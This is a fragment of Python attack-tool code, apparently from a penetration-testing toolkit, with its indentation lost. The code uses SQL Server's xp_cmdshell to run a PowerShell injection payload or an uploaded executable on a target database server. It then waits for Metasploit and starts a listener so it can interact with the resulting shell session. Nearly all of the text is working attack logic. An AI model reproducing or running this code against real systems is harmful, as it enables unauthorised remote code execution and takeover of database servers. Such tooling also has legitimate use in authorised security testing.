if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
try:
reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
print_status("Trigger the powershell injection payload.. ")
mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
if option == "2":
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(mssql.sql_query, (sql_command, ))
time.sleep(1)
# pause to let metasploit launch - real slow systems may need to adjust
# i need to rewrite this to do a child.expect on msf and wait until that happens
print_status("Pausing 15 seconds to let the system catch up...")
time.sleep(15)
print_status("Triggering payload stager...")
# if pexpect doesnt exit right then it freaks out
if os.path.isfile(setdir + "/set.payload"):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
